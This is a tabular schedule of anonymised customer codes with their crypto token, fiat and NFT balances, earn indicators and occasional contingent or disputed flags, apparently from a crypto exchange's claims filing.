| 07339279 | | BAT[1], DOGE[1], GRT[.00002883], TRX[2], USD[0.00] | | |
| 07339280 | | CUSDT[1], DOGE[18050.42722429], NFT (517526863637122362/Fortuo Distinctus #117)[1], TRX[1], USD[0.00] | Yes | |
| 07339281 | | BRZ[1], CUSDT[5], DOGE[.05993198], GRT[43.55186055], SHIB[569.59892207], SOL[.00004656], SUSHI[1.7684475], TRX[2], USD[0.00] | Yes | |
| 07339283 | | USD[0.09] | | |
| 07339284 | | USD[0.00] | | |
| 07339288 | | USD[10.00] | | |
| 07339289 | | USD[10.00] | | |
| 07339290 | | BRZ[2], CUSDT[5.00355816], DOGE[9575.38136817], KSHIB[89.38563837], SHIB[2878697.0817418], TRX[77.97166455], USD[0.14], USDT[.07954463] | Yes | |
| 07339291 | | USD[10.00] | | |
| 07339292 | | USD[10.00] | | |
| 07339293 | | DOGE[127.14522604], USD[11.00] | | |
| 07339294 | | USD[10.00] | | |
| 07339295 | | CUSDT[9], USD[0.00] | | |
| 07339296 | | BRZ[1], CUSDT[9], DOGE[1618.29797212], GRT[1], SHIB[1], SOL[2.05882574], USD[0.00] | | |
| 07339298 | | USD[10.00] | | |
| 07339299 | | DOGE[.00004211], TRX[1], USD[0.00] | | |
| 07339300 | | BRZ[0], BTC[0], DOGE[0], TRX[0], USD[0.01], USDT[0] | | |
| 07339301 | | BTC[.00115385], CUSDT[3], DOGE[3330.45125022], TRX[1], USD[0.00] | | |
| 07339302 | | USD[10.00] | | |
| 07339303 | | USD[10.00] | | |
| 07339304 | | USD[10.00] | | |
| 07339307 | | BTC[0], CUSDT[2], DOGE[0], GBP[0.00], USD[0.00] | Yes | |
| 07339308 | | DOGE[42.75615552], USD[0.00] | | |
| 07339309 | | USD[10.00] | | |
| 07339310 | | BRZ[0], BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07339311 | | BTC[0], USD[0.00] | | |
| 07339313 | | USD[10.00] | | |
| 07339314 | | DOGE[736.09274107], USD[0.00] | | |
| 07339315 | | USD[10.00] | | |
| 07339316 | | USD[10.00] | | |
| 07339317 | | CUSDT[2], DOGE[3], ETHW[.03835814], MATIC[.00128594], SHIB[2], USD[0.00] | Yes | |
| 07339318 | | USD[10.00] | | |
| 07339319 | | USD[0.00] | Yes | |
| 07339320 | | USD[10.98] | Yes | |
| 07339321 | | BAT[1.0165555], BRZ[3], CUSDT[12], DOGE[4.05213569], ETH[0], GRT[0], LTC[0], TRX[4.00247003], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07339322 | | USD[10.00] | | |
| 07339323 | | USD[10.00] | | |
| 07339324 | | CUSDT[6], DOGE[0], TRX[1.06245071], USD[0.00] | | |
| 07339325 | | USD[10.00] | | |
| 07339326 | | USD[10.00] | | |
| 07339327 | | DOGE[.40832143], TRX[14.71268093], USD[0.00] | | |
| 07339328 | | DOGE[.53882318], TRX[1], USD[0.01] | | |
| 07339329 | | USD[10.00] | | |
| 07339330 | | USD[0.15] | Yes | |
| 07339332 | | BRZ[3], CUSDT[5], DOGE[168.42102307], GRT[1.00488957], SOL[0], SUSHI[0], TRX[2], USD[0.00], USDT[1.10526119] | Yes | |
| 07339333 | | USD[10.00] | | |
| 07339334 | | CUSDT[1], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339335 | | DOGE[178.07647137], USD[0.00] | | |
| 07339336 | | USD[10.00] | | |
| 07339337 | | USD[10.00] | | |
| 07339338 | | CUSDT[6], TRX[2], USD[0.03] | | |
| 07339339 | | BRZ[5], CUSDT[25], SHIB[1], TRX[5], USD[0.01], USDT[1] | | |
| 07339340 | | USD[10.00] | | |
| 07339341 | | USD[10.00] | | |
| 07339342 | | BCH[0], BRZ[9.9301378], BTC[0], CUSDT[19], DOGE[626.13011178], ETH[0], GRT[0], KSHIB[0], LINK[0.00007007], LTC[0], MATIC[0], SHIB[1154684.43577061], SUSHI[0], TRX[0], USD[0.00], USDT[1.10856673] | Yes | |
| 07339343 | | TRX[2], USD[0.01] | | |
| 07339345 | | BTC[.00019541], USD[0.00] | | |
| 07339346 | | BCH[0], BTC[0], CUSDT[1], DOGE[1], ETH[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07339347 | | USD[0.00] | | |
| 07339348 | | BAT[1], CUSDT[3], DOGE[1], GRT[1], TRX[5], USD[0.00], USDT[0] | | |
| 07339349 | | USD[10.00] | | |
| 07339350 | | USD[10.00] | | |
| 07339351 | | USD[10.00] | | |
| 07339352 | | BAT[22.18872513], BRZ[2], CUSDT[5], DOGE[1], USD[0.00] | | |
| 07339353 | | DOGE[728.03912684], USD[11.06] | Yes | |
| 07339355 | | USD[10.00] | | |
| 07339356 | | USD[10.00] | | |
| 07339357 | | SHIB[789420.9421296], USD[1.01] | Yes | |
| 07339358 | | USD[10.00] | | |
| 07339359 | | USD[10.00] | | |
| 07339360 | | DOGE[1166.26832183], ETH[0], USD[0.71] | | |
| 07339361 | | CUSDT[3], USD[0.99] | | |
| 07339362 | | CUSDT[7], DOGE[.00999727], TRX[.00001389], USD[0.00] | | |
| 07339364 | Contingent, Disputed | USD[0.00] | | |
| 07339365 | | TRX[1], USD[0.00] | Yes | |
| 07339366 | | USD[10.00] | | |
| 07339367 | | BAT[17.79536592], USD[0.00] | | |
| 07339368 | | TRX[1], USD[0.00], USDT[0] | | |
| 07339369 | | USD[10.00] | | |
| 07339370 | | USD[10.00] | | |
| 07339371 | | DOGE[343.45106125], TRX[965.17835834], USD[0.00] | Yes | |
| 07339372 | | DOGE[1], TRX[1], USD[2326.43] | Yes | |
| 07339373 | | DOGE[2.70426706], USD[0.00] | | |
| 07339374 | | USD[10.00] | | |
| 07339375 | | CUSDT[5], SHIB[292842.42701511], USD[0.00] | Yes | |
| 07339376 | | BAT[8.77579348], USD[0.00] | | |
| 07339377 | | USD[10.00] | | |
| 07339378 | | CUSDT[0], DOGE[934.09482057], ETH[.01777029], ETHW[.01755141], SHIB[8084262.90578992], USD[0.04] | Yes | |
| 07339379 | | USD[10.00] | | |
| 07339381 | | USD[10.00] | | |
| 07339382 | | BAT[2.11185554], BRZ[4], CUSDT[7], DOGE[1], ETHW[.08025909], GRT[1.00404471], TRX[8], USD[0.01] | Yes | |
| 07339383 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07339385 | | USD[10.00] | | |
| 07339386 | | DOGE[10374.47153895], USD[0.00] | | |
| 07339387 | | USD[10.00] | | |
| 07339388 | | BAT[1], CUSDT[5], DOGE[2327.03837537], TRX[2], USD[0.00], USDT[1] | | |
| 07339389 | | DOGE[416.8966294], USD[0.00] | | |
| 07339390 | | BRZ[1], CUSDT[1], DOGE[1], SUSHI[.62609238], TRX[2], USD[0.00], USDT[1.09294547] | Yes | |
| 07339391 | | BCH[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], SOL[0], TRX[1], USD[0.00], YFI[0] | Yes | |
| 07339392 | | USD[10.00] | | |
| 07339393 | | USD[10.00] | | |
| 07339396 | | USD[10.00] | | |
| 07339397 | | USD[10.00] | | |
| 07339398 | | USD[10.00] | | |
| 07339399 | | BTC[.00218866], CUSDT[56.95132797], DOGE[158.27045327], ETH[.01565995], ETHW[.01546843], GRT[2.4262567], KSHIB[126.62690244], SHIB[575864.10658603], SOL[.02911058], TRX[83.93080345], USD[0.73], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339400 | | BRZ[1], DOGE[1478.12362257], USD[10.00] | | |
| 07339401 | | BRZ[2], CUSDT[2], TRX[2], USD[0.01] | | |
| 07339402 | | BAT[16.288], DOGE[.485], GRT[.636], SOL[.01153841], SUSHI[.18], TRX[.884], UNI[.0592], USD[6000.00] | | |
| 07339403 | | CUSDT[4], DOGE[7.3310589], SOL[15.91644496], TRX[136.84148164], USD[0.75] | Yes | |
| 07339404 | | USD[10.00] | | |
| 07339405 | | CUSDT[1], DOGE[27.23029411], USD[0.00], USDT[0] | | |
| 07339406 | | DOGE[2334.77119444], USD[0.00] | Yes | |
| 07339407 | | USD[10.00] | | |
| 07339408 | | USD[10.00] | | |
| 07339409 | | USD[10.00] | | |
| 07339411 | | USD[0.01] | | |
| 07339412 | | CUSDT[2], USD[0.00] | | |
| 07339413 | | AUD[12.58], CUSDT[1], TRX[2], USD[0.01] | | |
| 07339414 | | USD[10.00] | | |
| 07339415 | | USD[10.00] | | |
| 07339416 | | USD[0.01], USDT[0.00000001] | | |
| 07339417 | | BAT[23.28282692], CUSDT[7], DOGE[1], USD[0.00] | Yes | |
| 07339418 | | BAT[0], DOGE[0], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[10.84826728], USD[0.00] | | |
| 07339420 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07339421 | | USD[0.01] | | |
| 07339422 | | USD[10.00] | | |
| 07339423 | | DOGE[.61264026], USD[11.10] | Yes | |
| 07339425 | | USD[10.88] | Yes | |
| 07339426 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07339427 | | USD[10.00] | | |
| 07339428 | | BRZ[1], CUSDT[22], DOGE[2], TRX[5], USD[0.01] | | |
| 07339429 | | DOGE[.0000337], USD[0.00] | | |
| 07339430 | | CUSDT[5], DOGE[209.18039017], SHIB[364272.45466228], TRX[3], USD[25.51] | | |
| 07339431 | | BRZ[1], BTC[.00005328], DOGE[131.07016009], USD[4.39] | | |
| 07339432 | | BRZ[1], CUSDT[1], TRX[1], USD[0.01], USDT[0] | | |
| 07339433 | | USD[10.00] | | |
| 07339434 | | BAT[1], BRZ[2], CUSDT[1], DOGE[34498.34391827], TRX[2], UNI[1], USD[-663.39], USDT[1] | | |
| 07339435 | | CUSDT[5], USD[0.00] | | |
| 07339437 | | BTC[.00004396], CUSDT[2], DOGE[1], ETH[.00113587], ETHW[.00113587], TRX[2], USD[0.51] | | |
| 07339438 | | USD[10.00] | | |
| 07339439 | | USD[0.00] | Yes | |
| 07339441 | | USD[10.00] | | |
| 07339442 | | USD[10.87] | Yes | |
| 07339444 | | BTC[.01002473], CUSDT[2], DOGE[4215.63103962], ETH[.51200817], ETHW[.51200817], LTC[.78879734], TRX[2], USD[0.00] | | |
| 07339445 | | BRZ[4], CUSDT[20], DOGE[1], TRX[4], USD[316.06], USDT[1] | | |
| 07339446 | | USD[0.00] | | |
| 07339447 | | USD[10.00] | | |
| 07339448 | | CUSDT[1], DOGE[1], ETH[.0115491], ETHW[.0115491], USD[0.00] | | |
| 07339449 | | USD[10.90] | Yes | |
| 07339450 | | USD[10.00] | | |
| 07339451 | | DOGE[.66556207], GRT[1.00404471], USD[110.77] | Yes | |
| 07339452 | | CUSDT[2], DOGE[2170.37537729], USD[0.00] | Yes | |
| 07339453 | | ETH[0], USD[0.00] | | |
| 07339454 | | BRZ[8], CUSDT[8], DOGE[1178.81966193], ETH[3.17433493], ETHW[3.17433493], GRT[4], LINK[55.76736998], PAXG[.02606729], SUSHI[6.37930902], TRX[564.60786424], USD[0.79], USDT[1] | | |
| 07339455 | | BRZ[2], DOGE[138420.20653340], ETH[0], ETHW[0], SHIB[1], SOL[0], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07339456 | | USD[10.00] | | |
| 07339457 | | USD[10.00] | | |
| 07339458 | | BTC[0], ETH[0], ETHW[0], LTC[0], MATIC[2.38311989], SOL[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07339459 | | BRZ[1], BTC[.000073], CUSDT[5], TRX[1], USD[0.00] | | |
| 07339460 | | USD[10.00] | | |
| 07339461 | | USD[10.00] | | |
| 07339462 | | USD[11.68] | Yes | |
| 07339463 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339464 | | BRZ[6.30470183], CUSDT[15], DOGE[5.01793029], LINK[24.28098591], NFT (380488799882164269/Entrance Voucher #2084)[1], NFT (412169688101974804/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #61)[1], NFT (447530400944482117/Tim Brown's Playbook: Michigan State vs. Notre Dame - September 19, 1987 #43)[1], NFT (461322560306424054/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #60)[1], NFT (492044369166159491/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #57)[1], NFT (542698414673309147/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #56)[1], SHIB[2223244.84549846], SOL[.01974779], TRX[4], USD[0.00], USDT[1.02543197] | Yes | |
| 07339465 | | USD[10.84] | Yes | |
| 07339466 | | DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07339467 | | BRZ[1], CUSDT[1], DOGE[2720.17726804], USD[0.00] | | |
| 07339468 | | BRZ[2], CUSDT[3], DOGE[2], GRT[0], LINK[0], SOL[0], SUSHI[155.61729247], TRX[5], USD[0.00], USDT[2], YFI[0] | | |
| 07339470 | | BRZ[1], CUSDT[2], DOGE[.10224476], USD[0.01] | Yes | |
| 07339471 | | BRZ[1], CUSDT[1], DOGE[388.84942692], TRX[2], USD[0.00], USDT[0.00000001] | | |
| 07339473 | | USD[10.00] | | |
| 07339474 | | USD[10.00] | | |
| 07339475 | | USD[10.00] | | |
| 07339476 | | BTC[.01653076], DOGE[21048.59482053], ETH[0.01162862], KSHIB[0], SHIB[28211083.23853725], USD[0.00], USDT[0] | Yes | |
| 07339477 | | USD[10.00] | | |
| 07339478 | | SHIB[2.71037124], USD[0.00] | Yes | |
| 07339481 | | BCH[.0870702], CUSDT[8], DOGE[1048.74005536], SOL[2.34627395], USD[0.00] | Yes | |
| 07339482 | | CAD[0.00], CUSDT[3], ETH[0], GRT[0], SOL[0], USD[0.00] | Yes | |
| 07339483 | | BAT[1.01187127], BCH[2.91433033], BRZ[1], BTC[.28366228], CUSDT[8], DOGE[10887.8590222], ETH[1.19706324], ETHW[1.19659381], GRT[105.54632013], LTC[11.54573108], SOL[88.13705341], TRX[598.90260931], USD[0.00] | Yes | |
| 07339484 | | BRZ[3], DOGE[23.31708993], GRT[1.00367791], USD[0.00] | Yes | |
| 07339486 | | BRZ[0], BTC[.00000005], CUSDT[9], DOGE[2882.11575411], ETH[.0090738], ETHW[.00896436], TRX[367.0784517], USD[0.00] | Yes | |
| 07339489 | | USD[10.00] | | |
| 07339490 | | DOGE[585.94792789], TRX[1], USD[22.60] | | |
| 07339491 | | BRZ[2], CUSDT[1], TRX[1], USD[0.01] | | |
| 07339492 | Contingent, Disputed | BTC[0], DOGE[0], SOL[0], USD[16.15] | | |
| 07339493 | | DOGE[58.02653158], USD[0.00] | | |
| 07339494 | | DOGE[25013.89060059], USD[0.00] | Yes | |
| 07339495 | | USD[10.00] | | |
| 07339496 | | BTC[.0004501], CUSDT[1], DOGE[1], USD[0.00], USDT[0] | | |
| 07339497 | | BTC[.0010855], CUSDT[5], DOGE[859.88035336], ETH[.01188939], ETHW[.01173891], GRT[9.47828537], LINK[.42676305], SOL[1.19403759], SUSHI[.62041407], TRX[1], UNI[1.22071759], USD[0.05] | Yes | |
| 07339498 | | BTC[0], CUSDT[1], DOGE[57.76973778], SUSHI[0], USD[0.00] | | |
| 07339499 | | USD[0.57] | Yes | |
| 07339500 | | USD[110.00] | | |
| 07339501 | | DOGE[1], USD[12.02] | | |
| 07339503 | | CUSDT[1], DOGE[517.19943819], USD[0.02] | | |
| 07339504 | | CUSDT[1], USD[0.01] | | |
| 07339505 | | USD[10.00] | | |
| 07339506 | | BRZ[1], CUSDT[11], DOGE[.00049547], ETH[.0000003], ETHW[.0000003], MATIC[3.33820736], NFT (381187810813681729/Dream Women #18)[1], NFT (392359880104820341/Dream Forest)[1], TRX[3.81050935], USD[0.37], USDT[0] | Yes | |
| 07339507 | | TRX[0], USD[0.00] | | |
| 07339508 | | CUSDT[1], TRX[1], USD[0.02] | | |
| 07339509 | | ETH[.00591999], ETHW[.00585154], NFT (448172114112334791/Entrance Voucher #2890)[1], USD[0.00] | Yes | |
| 07339510 | | BTC[0], CUSDT[4], DOGE[1103.80866007], USD[0.01] | Yes | |
| 07339511 | | USD[10.00] | | |
| 07339512 | | DOGE[.00006939], USD[0.00] | | |
| 07339513 | | CUSDT[6], DOGE[98.16837312], ETH[.19610636], ETHW[.19610636], GRT[1], TRX[2], USD[0.00] | | |
| 07339514 | | USD[10.00] | | |
| 07339515 | | USD[10.00] | | |
| 07339516 | | USD[10.87] | Yes | |
| 07339517 | | BRZ[1], CUSDT[3], TRX[1], USD[0.00] | | |
| 07339518 | | USD[10.00] | | |
| 07339519 | | DOGE[1], ETH[0], LINK[0], USD[0.00], USDT[0] | Yes | |
| 07339520 | | USD[10.00] | | |
| 07339521 | | USD[10.00] | | |
| 07339522 | | DOGE[1], USD[0.00] | | |
| 07339523 | | USD[10.00] | | |
| 07339524 | | BRZ[0], ETH[0], USD[0.00], USDT[0], YFI[.00003284] | | |
| 07339525 | | BTC[0], ETH[0], ETHW[.29729553], LINK[.00003525], SOL[.00010766], SUSHI[.00006656], TRX[1], UNI[.00004743], USD[92.41] | Yes | |
| 07339526 | | BRZ[1], TRX[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339527 | | CUSDT[3], DOGE[1], USD[0.01] | | |
| 07339528 | Contingent, Disputed | BCH[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0], SHIB[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07339529 | | DOGE[2], TRX[1], USD[0.00] | | |
| 07339530 | | USD[10.00] | | |
| 07339531 | | USD[10.00] | | |
| 07339532 | | USD[10.00] | | |
| 07339534 | | USD[10.00] | | |
| 07339535 | | USD[10.00] | | |
| 07339536 | | USD[10.00] | | |
| 07339537 | | USD[10.00] | | |
| 07339539 | | USD[10.00] | | |
| 07339540 | | CUSDT[51.57544125], DOGE[11.36050331], USD[9.92] | Yes | |
| 07339541 | | BTC[.00000164], CUSDT[1], TRX[4], USD[0.00], USDT[1] | | |
| 07339542 | | BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], TRX[0], USD[0.00] | Yes | |
| 07339545 | | USD[10.00] | | |
| 07339546 | | BTC[.00000278], DOGE[ 143], LTC[3.62544], USD[2.09], USDT[.44842] | | |
| 07339547 | | BRZ[1], CUSDT[2], TRX[4], USD[0.00] | | |
| 07339548 | | CUSDT[1], DOGE[1761.1120475], USD[10.04] | | |
| 07339549 | | USD[10.00] | | |
| 07339550 | | USD[10.00] | | |
| 07339551 | | MKR[.00996909], USD[0.00] | | |
| 07339552 | | BTC[.00981498], SHIB[817507.88248337], SOL[6.61595521], USD[0.00] | | |
| 07339555 | | USD[10.00] | | |
| 07339556 | | TRX[188.41652865], USD[0.00] | | |
| 07339557 | | USD[10.00] | | |
| 07339558 | | BAT[1], BRZ[1], DOGE[1], ETH[.00000108], ETHW[.00000108], LINK[.00004599], MATIC[.00009457], NFT (33143821041614754/The Beginning)[1], NFT (348806432197160841/The Hellions #762)[1], NFT (435573099443745214/Eitbit Ape #3338)[1], SHIB[239.6079668], SOL[.00021072], USD[0.01], USDT[0.00000001] | Yes | |
| 07339559 | | USD[10.00] | | |
| 07339563 | | DOGE[.00895511], SHIB[79701.48373081], TRX[1], USD[0.70] | | |
| 07339564 | | USD[10.00] | | |
| 07339565 | | USD[0.01] | | |
| 07339566 | | USD[10.00] | | |
| 07339567 | | DOGE[0], SHIB[823163.29697083], USD[0.00] | Yes | |
| 07339568 | | BRZ[0], BTC[0], CUSDT[1], ETH[0], GRT[567.72747964], SHIB[1], TRX[0], USD[0.00], USDT[0.00001269] | Yes | |
| 07339569 | | BCH[0], BRZ[0], BTC[0], CUSDT[1], DOGE[1.01690907], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[1], UNI[0], USD[0.01], USDT[0], YFI[0] | Yes | |
| 07339570 | | DOGE[2], USD[0.00] | | |
| 07339571 | | USD[0.00] | | |
| 07339572 | | DOGE[1], USD[0.00] | | |
| 07339573 | | USD[10.00] | | |
| 07339574 | | USD[10.00] | | |
| 07339575 | | USD[510.00] | | |
| 07339576 | | USD[10.00] | | |
| 07339577 | | CUSDT[1], USD[0.00] | | |
| 07339578 | | BTC[.00018017], USD[0.00] | Yes | |
| 07339579 | | CUSDT[1], DOGE[4.02466005], GRT[26.22150961], SUSHI[32.48495848], TRX[220.76757931], USD[0.00] | Yes | |
| 07339581 | | BAT[0], BTC[0], DOGE[4.05150667], ETH[0.00694249], ETHW[0.00686041], SUSHI[0], UNI[0], USD[0.00] | Yes | |
| 07339582 | | USD[10.00] | | |
| 07339584 | | DOGE[9281.11976775], TRX[1], USD[10.00] | | |
| 07339585 | | USD[10.00] | | |
| 07339586 | | USD[10.00] | | |
| 07339587 | | USD[0.00] | Yes | |
| 07339588 | | USD[0.00] | | |
| 07339589 | | USD[10.00] | | |
| 07339590 | | BTC[.00241777], CUSDT[2], ETH[.02494829], ETHW[.02494829], TRX[1], USD[0.00] | | |
| 07339591 | | DOGE[0], SHIB[29214533.86412730], USD[0.00] | Yes | |
| 07339592 | | USD[10.00] | | |
| 07339593 | | USD[10.00] | | |
| 07339594 | | BAT[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], LTC[0], SOL[0], SUSHI[0], USD[0.02], USDT[0] | | |
| 07339595 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339596 | | USD[0.00] | | |
| 07339597 | | ALGO[59.17004083], BAT[17.0765538], BCH[.03156278], BRZ[126.58800284], BTC[.00099827], CUSDT[389.00863336], DAI[16.04468265], DOGE[435.82688025], ETH[.01451606], ETHW[.01433822], GRT[8.30328219], KSHIB[311.84288856], LTC[.02463925], MATIC[25.36244885], NFT (5645043274456354533/Entrance Voucher #2506)[1], SHIB[1163771.57327058], SOL[3.89119347], SUSHI[1.13604465], TRX[252.56500908], USD[0.00] | Yes | |
| 07339598 | | USD[9.10] | | |
| 07339599 | | BTC[0], CUSDT[12], DOGE[667.76552583], MATIC[16.18506888], TRX[4], USD[0.00] | | |
| 07339600 | | CUSDT[2], DOGE[6347.92572257], ETH[.039686], ETHW[.03919352], SOL[0], USD[0.50] | Yes | |
| 07339601 | | BRZ[2], CUSDT[7], GRT[1.00367791], TRX[7], USD[0.01], USDT[2.19008702] | Yes | |
| 07339602 | | USD[10.00] | | |
| 07339603 | | BRZ[2], CUSDT[1152.47837282], ETHW[.18537877], SHIB[28], TRX[774.82932067], USD[0.00] | Yes | |
| 07339604 | | USD[10.00] | | |
| 07339605 | | USD[10.00] | | |
| 07339606 | | USD[10.00] | | |
| 07339607 | | USD[10.00] | | |
| 07339608 | | CUSDT[47.78933895], TRX[1], USD[0.08] | | |
| 07339609 | | USD[10.00] | | |
| 07339610 | | SUSHI[.65713635], USD[0.00] | | |
| 07339612 | | DOGE[1.04354965], USD[0.00] | | |
| 07339613 | | USD[10.00] | | |
| 07339615 | | USD[10.00] | | |
| 07339616 | | USD[10.00] | | |
| 07339617 | | CUSDT[1], USD[0.00] | Yes | |
| 07339618 | | USD[10.00] | | |
| 07339620 | | USD[10.00] | | |
| 07339621 | | DOGE[132.14712785], USD[0.00] | | |
| 07339622 | | CUSDT[1], USD[0.84] | Yes | |
| 07339623 | | CUSDT[1], DOGE[4.05213569], GRT[1.00498957], TRX[.20903843], USD[0.00] | Yes | |
| 07339624 | | BRZ[3], BTC[.00417936], CUSDT[29], DOGE[2234.17738698], ETH[.09996778], ETHW[.09893582], GRT[31.34469474], KSHIB[224.49097374], LINK[1.74710051], LTC[.21807101], MATIC[35.97692485], NFT (368178172083515130/ApexDucks #3322)[1], NFT (389688233453284846/Miner Bot 732)[1], NFT (540909113881787957/Settler #3877)[1], SHIB[1], SOL[1.87533151], SUSHI[2.50854481], TRX[9.00633097], UNI[2.40524704], USD[0.24] | Yes | |
| 07339625 | | USD[10.00] | | |
| 07339626 | | BTC[.0000296], DOGE[38.99005471], ETH[0.00177218], ETHW[0.00177218], LTC[.00752749], SOL[.1161271], SUSHI[0.08219025], USD[13.25] | | |
| 07339627 | | DOGE[5631.06608746], KSHIB[264.47651898], SHIB[285585.94508452], USD[0.00] | Yes | |
| 07339628 | | CUSDT[4], SUSHI[2.09498761], USD[0.00] | Yes | |
| 07339629 | | USD[10.00] | | |
| 07339630 | | CUSDT[1], DOGE[736.64513478], USD[0.00], USDT[0.00000840] | | |
| 07339631 | | BRZ[1], CUSDT[2], DOGE[1], ETH[0.00000235], SHIB[6], TRX[8], USD[0.00], USDT[1.00155644] | Yes | |
| 07339632 | | SHIB[25348056.44516176], SOL[0], USD[0.00] | Yes | |
| 07339633 | | DOGE[34.49543445], USD[0.00] | Yes | |
| 07339634 | | DOGE[27.7455139], USD[0.00] | | |
| 07339635 | | ALGO[0], BF_POINT[400], DOGE[1], MATIC[.00077356], SHIB[2], TRX[1.03808562], UNI[.0003331], USD[0.10], USDT[0], YFI[0] | Yes | |
| 07339636 | | USD[10.00] | | |
| 07339637 | | USD[10.00] | | |
| 07339638 | | USD[10.00] | | |
| 07339639 | | USD[0.01] | | |
| 07339640 | | CUSDT[2], DOGE[3.83450351], USD[0.00] | | |
| 07339641 | | USD[10.00] | | |
| 07339642 | | CUSDT[1], DOGE[2], GRT[82.60699617], TRX[2140.21915139], USD[0.00] | | |
| 07339645 | | USD[2297.19], USDT[0] | | |
| 07339646 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07339647 | | CUSDT[2], USD[0.00] | Yes | |
| 07339648 | | CUSDT[1], DOGE[4], TRX[323.68997623], USD[0.25] | | |
| 07339649 | | USD[10.00] | | |
| 07339650 | | USD[10.00] | | |
| 07339651 | | USD[10.00] | | |
| 07339652 | | BAT[2], BRZ[2], BTC[.00059595], CUSDT[7], TRX[8], USD[0.00], USDT[1] | | |
| 07339655 | | DOGE[36.45239463], USD[0.00] | | |
| 07339656 | | TRX[80.17266626], USD[0.00] | | |
| 07339657 | | BAT[.2071772], CUSDT[1], DOGE[1], SHIB[16], TRX[4], USD[85.34] | | |
| 07339658 | | BTC[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339659 | | DOGE[1], GRT[32.53946509], USD[11.00] | Yes | |
| 07339660 | | USD[10.00] | | |
| 07339661 | | USD[0.02] | Yes | |
| 07339662 | | NFT (514690087858871496/Australia Ticket Stub #1785)[1], NFT (552505963826822671/Entrance Voucher #29558)[1], SHIB[5], SOL[0], USD[0.00], USDT[0.00254638] | Yes | |
| 07339663 | | USD[10.00] | | |
| 07339664 | | NFT (455186977171851009/Entrance Voucher #2270)[1] | | |
| 07339665 | | BAT[1.01655549], BRZ[1], CUSDT[1], SOL[16.17457022], USD[0.00] | Yes | |
| 07339666 | Contingent, Disputed | USD[0.00] | | |
| 07339667 | | BAT[3], CUSDT[3], DOGE[3], MATIC[6870.07110766], SHIB[91222497.45009471], SUSHI[2296.21069942], TRX[7], UNI[1], USD[0.00], USDT[1] | | |
| 07339668 | | USD[10.00] | | |
| 07339669 | | USD[10.00] | | |
| 07339670 | | USD[10.00] | | |
| 07339672 | | USD[10.00] | | |
| 07339673 | | USD[10.00] | | |
| 07339674 | | USD[10.00] | | |
| 07339675 | | USD[0.00], USDT[0] | | |
| 07339676 | | BRZ[2], CUSDT[3], DOGE[12733.31579346], TRX[1], USD[0.00] | | |
| 07339677 | | USD[10.00] | | |
| 07339678 | | USD[10.00] | | |
| 07339679 | | BRZ[0], DOGE[1575.94962606], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07339680 | | USD[10.00] | | |
| 07339681 | | USD[10.00] | | |
| 07339682 | | USD[10.00] | | |
| 07339684 | | BCH[1.1056525], CUSDT[580.91495446], GRT[121.85627139], LINK[6.41532467], SHIB[1], TRX[2490.09779293], USD[0.00] | Yes | |
| 07339685 | | BTC[0], DOGE[0], TRX[0], USD[0.00] | | |
| 07339686 | | USD[10.00] | | |
| 07339687 | | BAT[1], CUSDT[2], DOGE[2], ETH[.41918499], ETHW[.41918499], GRT[2], USD[0.01], USDT[1] | | |
| 07339688 | | USD[10.00] | | |
| 07339689 | | USD[10.00] | | |
| 07339691 | | CUSDT[1], DOGE[0], SHIB[0], USD[0.00] | | |
| 07339692 | | DOGE[145.65683366], USD[0.00] | | |
| 07339693 | | BAT[.00001854], BRZ[1], CUSDT[11], NFT (310389183393161031/Panda Fraternity #1679)[1], NFT (318271855056423194/Joylina's Cantina S1 #8112)[1], NFT (392249591289345406/Rtox #226)[1], NFT (452120455748562122/Panda Fraternity #2883)[1], NFT (507142825813534553/Toasty Turts #1120)[1], NFT (557005764280567355/Toasty Turts #3716)[1], NFT (568600405382952579/Joylina's Cantina S1 #790)[1], USD[0.00], USDT[1.02544162] | Yes | |
| 07339694 | | DOGE[1], ETH[0], USD[0.01] | | |
| 07339695 | | USD[10.00] | | |
